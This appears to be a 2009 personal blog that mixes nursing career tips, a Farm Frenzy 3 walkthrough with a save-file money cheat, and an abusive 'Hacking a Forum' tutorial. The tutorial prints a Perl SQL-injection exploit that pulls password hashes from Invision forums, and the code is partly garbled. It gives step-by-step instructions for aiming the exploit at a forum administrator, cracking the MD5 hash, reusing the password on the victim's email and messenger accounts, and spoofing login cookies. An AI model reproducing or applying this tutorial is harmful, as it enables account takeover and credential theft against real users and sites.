Monday, September 21, 2009

To start a Nursing Job what you should do

As a newly hired nurse you were able to experience a lot of expectation from you and co-nurses. To ensure success in your work try to listen to several advices from the experienced nurses in the field. They can help you in one way or another particularly when it comes to your performance as a preventive care provider.

Here are some tips to start your Nursing Job:

1. Enhance your Orientation – Grab learning opportunity that comes your way. Since you are new in the field orientation is always present, try to listen and understand during the orientation if you find it difficult for you to absorb the ideas presented ask other staff to reorient you. Note there’s no harm in trying and asking for as long as it can help you improve yourself.
2. Work with your Mentor – Try to be cooperative to the mentor assigned for you. As much as possible work closely with her/him. For you’ve learned a lot from your mentor especially taking about wisdom as an expert in that field they have a lot to share so learn from it. Mismatch do occur if it happens ask politely to the unit manager if there is a possibility to change a mentor but prior to that do your best to work hand in hand with your current mentor in a harmonious way.
3. Think several times before taking an action – If you are turn between situations that we consider as a unhealthy dynamics think several times before you take an actions see to it that the result of your action is positive and beneficial, so think of a good solution don’t go for an actions that might put you in unhealthy condition.
4. Bond with your Team – Get to know the people that surrounds you especially your co-workers. Find time to mingle with them this create a friendly environment, this will help you from being a lone and bored. Offers a service if you think they need a help for in return they do the same.
5. Be Teachable – Don’t pretend that you know everything. Don’t hesitate to ask questions if you think you need some answers. Accept ideas and opinions of others. Be willing to be taught.
6. Keep your eyes open – Be observant in the environment that you belong specially in your practice setting. Being keen observer is not bad for as long as you learned from what you see and notice. For with that you will know what will works and what will not.
7. Set Priorities – List down the priorities that you have in your life and work. Then put first things first.
8. Make friends – Don’t be selected when choosing friends. Be friendly in the community that you belong makes friends in high and low places. Don’t think that you are superior than others for everybody are equal consider individual differences.
9. Recharge your batteries – To be a better and effective nurse takes time to distress.
10. Evaluate your performance - In every work that you do it is not always a guarantee that you are effective for sometimes you commit mistakes. What is important is that you evaluate yourself. Note that there is a room for improvement so to be more effective in your nursing job learns from your mistakes.

Sunday, September 20, 2009

What you should know and do before going to a Nursing Job Fair?

Now a day, it is very common to hear a Nursing Job Fair conducted for it is an excellent way to gather nurses and hospitals all over the world.

Before attending the Nursing Job Fair here are the things that you should know and do;
· Prior to the event look for enough information about the job fair, the possible organization that attend, the site and necessary document that needed. This will give you enough idea on what you want and what you are going to do.
· Dress yourself in a most presentable way that is professionally. Fix yourself before going to the location for it is usually a common thing to have an instant interview in a job fair.
· Have a list of the companies that may attend the said event and make your own list of companies where you are interested visiting.
· Arrive early this will help yourself be familiar with the location. Particularly the booth of the companies that attracts your interest. With this you can save time during the fair proper.
· Always prepare yourself in a spot interview. It might be your lucky day during the job fair. That’s the reason why it is good if you have already research something about the company that you are interested most so that you have enough background during the interview.
· Mingle with other people that attend the job fair, an exchange of ideas will help you decide better.
· Don’t forget to bring updated copy of your resume see to it that necessary information is present. Double check your resume don’t let topographical errors or misspelled words ruined your application.

Tuesday, September 15, 2009

Farm Frenzy 3 Walkthrough - Hints - Tips - Gold Solution

sell bear
buy 5 flour
get 10 eggs
sell ducks
buy 5 flour
make egg powder and cookies
upgrade warehouse
make cakes twice
sell 10 cakes
buy yak
when you get 1 wool, sell yak
buy spinnery
make sewing

buy the fitting room to get the money
sell 30 cakes to get enoughmoney
then sell the regular pinguins
sell feathers to get money
buy 2 pinguin
wait for 1 tusk then sell the walrus and tusk
buy 3 golden pinguin, upgrade helicopter, buy 6 cloth
upgrade warehouse once
upgrade car once
sell 3 bears
then run the factories with 3 feathres at a time
buy clothes untill total 20 and buy 10 flour
sell 3 neat white bears
buy cat and upgrade water to max
sell 3 neat white bear 3 times more more
when you have 10 eggs, sell pinguins
buy egg powder plants, upgrade to max
make cakes 5 at a time
buy wallrus
sell the walrus
sell 3 neat white bear to get enough money
buy 2 sheeps
upgrade warehouse once
upgrade car twice
get money by selling costume
buy cheese
sell cheese and buy again when you have enough money
7 falling products in a row
How to Really CHEAT with FARM FRENZY 3?
If you are using XP, you can actually change the value of your GOLDMoney to upgrade everything within the SHOP.
Here's How to do it.
Make sure you will be able to see you Application Data folder.
go to this folder C:\Documents and Settings\All Users\Application Data\FarmFrenzy3\profiles, then you will see an XML file start with 00000001 (1 is your id) if you are the first one to register the game).
Open that xml file (00000001.xml) using noted pad or any text editor).
Hit F3 or go to Edit Menu then Find and search for the text "Goldmoney".
change the VAL to any value you want and WALLLAHHH!!!">

Restart Farm Frenzy and you visit the shop and start upgrading all the tools you have in there.

Good luck

Tuesday, September 1, 2009

Hacking a Forum

This is what you like to call "Hacking a forum".

I call it "Cracking into a forum" ... Learn what hacking means you lazy fucks, lol...

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as "hackingsite".

So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:

#!/usr/bin/perl -w
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
print "..By ReMuSoMeGa & Nova. Usage: [id] [ver 1/2].\n\n";

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
$outputs .= $current;
print "$current\n";

if ( length($outputs) < member_id=" . $user . " pass_hash="">

What the fuck,Pretty confused, aren't you? What the fuck are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.

How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.

Your going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.

Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".

So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that your in, drag and drop "" from your desktop, into "bin".

Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...

What your going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD

Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin

Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the file. How do we do this? Type the following command into your command prompt:


So, this is what we need to do. Type the following command into your command prompt: 2 1

Obviously replace "" with the URL to the forum you wish to hack.

Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.

Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash's before continuing reading.

Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!

LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.

There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Able", which is a great MD5 cracker availiable at ''.

You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.

CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up

But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?

Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"

Good luck!